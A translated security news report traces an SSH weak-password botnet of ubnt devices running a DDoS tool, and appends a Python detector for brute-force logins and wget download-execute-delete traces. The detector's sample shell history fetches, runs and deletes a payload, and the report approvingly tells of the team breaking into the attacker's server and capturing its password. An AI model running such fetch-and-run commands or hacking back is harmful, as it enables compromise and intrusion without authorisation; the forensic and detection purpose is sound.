2025-01-19 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/01 Report
This article describes in detail the whole process of finding the victim, analysing the behaviour, counterattacking the attacker's server, successfully obtaining access and completing the forensics. There are many attacks of this kind, especially "blind scan" attacks that target one specific type of system.
Recently, the Anheng security research team observed a large number of brute-force attempts against port 22 (SSH) using weak passwords. After detailed analysis, the team found that a large number of ubnt devices on the Internet have weak passwords and have had backdoors implanted by automated tools. The Anheng APT network early-warning platform successfully detected this attack:
On March 19th, after a customer reported a network failure, an Anheng engineer contacted the customer and carried out a remote emergency response. Several suspicious shell processes were found on one of the customer's devices.
The main function of these shell scripts is to download and run suspicious files with wget and then delete the downloaded files, which makes later forensics difficult.
We opened the malicious page involved; from the screenshot we can see:
The file "10010" on the suspicious IP 222.*.*.62 was downloaded 9108 times in one day.
The file "hope9" on the suspicious IP 180.*.*.241 was downloaded 396 times in 48 minutes.
After analysis, we found that the two suspicious files are DDoS tools built for the MIPS architecture, which foreign researchers call "Mr. Black".
Their main functions are common DDoS attack methods such as GET_Flood, SYN_Flood and UDP_Flood.
The next day we continued to observe and found that the download count of one of the malicious files had risen from 9108 to 15171.
An increase of about 6000 downloads in a single day is something we took very seriously.
We took control of the malicious server through technical means, and after logging in over remote desktop we found that port 8000 on the host had established network connections with many other IPs.
Opening several of these IPs at random, we found that they were all ubnt devices!
During the forensics, we found a large amount of software on the desktop.
And coincidentally, the attacker also happened to be logged in to this machine remotely at the time.
We used netstat to find the attacker's IP.
The malicious IP 139.201.133.104 was found; a lookup on ip138 shows that this IP belongs to Sichuan.
Later, we successfully captured the administrator's password with a tool, and after logging in with the administrator account and password we found that the remote control tool was open.
From the screenshot we can see that it is listening on port 8000 and that 564 hosts are under its control.
Port 8000 also matches what we saw with netstat!
In addition, when we checked the network connections with TCPView, the host was also attacking port 9200 on other IPs.
Port 9200 is the port opened by the Elasticsearch service. It can be exploited because older versions of Elasticsearch have a remote command execution vulnerability. The POC is as follows:
For details, please see: http://www.wooyun.org/bugs/wooyun-2014-062127
So the attacker also uses port 9200 to implant the backdoor (a worm for the Linux architecture).
Note that the target here is the Elasticsearch server, which is implanted as follows:
After obtaining the relevant malicious files during the forensics, we found that the tool used to implant the ubnt devices is called "linux Command batch execution tool".
The commands it uses to implant the malicious programs are the same as the ones we saw on the customer's devices!
It is inferred that the whole attack process is as follows:
Brute-force port 22 with weak passwords
Call shell commands to implant the backdoor
The attacker then sends instructions to the compromised devices
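As an added example (not part of the Anheng report), here is a small Python detector for the two traces the inferred process leaves on a device: a run of SSH password failures from one source followed by a successful password login, and a wget download that is executed and then deleted. The log lines, shell history, IPs and URL are constructed.

```python
import re
from collections import Counter
# Constructed sshd log (not from the report): a weak-password run against
# port 22 that eventually succeeds, then an unrelated key-based login.
AUTH_LOG = """\
Mar 19 02:11:03 gw sshd[2201]: Failed password for ubnt from 203.0.113.7 port 51022 ssh2
Mar 19 02:11:04 gw sshd[2203]: Failed password for ubnt from 203.0.113.7 port 51024 ssh2
Mar 19 02:11:05 gw sshd[2205]: Failed password for root from 203.0.113.7 port 51026 ssh2
Mar 19 02:11:06 gw sshd[2207]: Accepted password for ubnt from 203.0.113.7 port 51028 ssh2
Mar 19 02:15:40 gw sshd[2300]: Accepted publickey for admin from 192.0.2.10 port 40002 ssh2
"""
# Constructed shell history from the same device: fetch the payload, run it,
# then remove it, which is the download-execute-wipe pattern described above.
SHELL_HISTORY = """\
wget http://198.51.100.9/10010 -O 10010
chmod +x 10010
./10010 &
rm -f 10010
ls -la
"""
FAILED = re.compile(r"Failed password for (?:invalid user )?\S+ from (\S+) port")
ACCEPTED = re.compile(r"Accepted password for \S+ from (\S+) port")

def ssh_bruteforce_then_success(log, threshold=3):
    """Return {ip: failures} for sources with >= threshold password failures
    followed by a successful password login: a brute force that worked."""
    failures, hits = Counter(), set()
    for line in log.splitlines():
        m = FAILED.search(line)
        if m:
            failures[m.group(1)] += 1
        elif (m := ACCEPTED.search(line)) and failures[m.group(1)] >= threshold:
            hits.add(m.group(1))
    return {ip: failures[ip] for ip in hits}

def download_execute_delete(history):
    """Return names of files that were wget-fetched, executed and then removed."""
    fetched, executed, removed = set(), set(), set()
    for parts in (c.split() for c in history.splitlines() if c.strip()):
        if parts[0] == "wget":
            # Saved name is the -O argument, otherwise the last URL path segment.
            name = parts[parts.index("-O") + 1] if "-O" in parts else parts[-1].rsplit("/", 1)[-1]
            fetched.add(name)
        elif parts[0].startswith("./"):
            executed.add(parts[0][2:])
        elif parts[0] == "rm":
            removed.update(p for p in parts[1:] if not p.startswith("-"))
    return sorted(fetched & executed & removed)
```

Fed real sshd logs and audit or history data, both checks give a quick triage signal for the compromise chain described above.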
From the results saved after scanning, we can see that a large number of ubnt devices have weak passwords. (The usernames and passwords used for the brute force are the factory default passwords of ubnt devices!)
We randomly tried several devices and found that the default weak password was still in place, and that multiple devices had been implanted with worms from different URLs several times.
Preliminary statistics of the URLs include:
And the malicious URLs are constantly changing (note: not all of them!).
Later analysis showed that many of the malicious files use *.f3322.org and *.f3322.net domains as the control domain names of the malicious services. The registration information of these two domains is the same as that of pubyu.com (formerly 3322.org). Both provide free second-level domain name registration, so they are very popular!
The Anheng security team once again reminds customers to carry out security awareness education and eliminate weak and default passwords of all kinds. In addition, with the rapid development of the Internet of Things, personal computers may no longer be the main target of intrusion; any device connected to the network may be compromised. Major traditional equipment manufacturers should also shoulder the responsibility of protecting their customers' interests!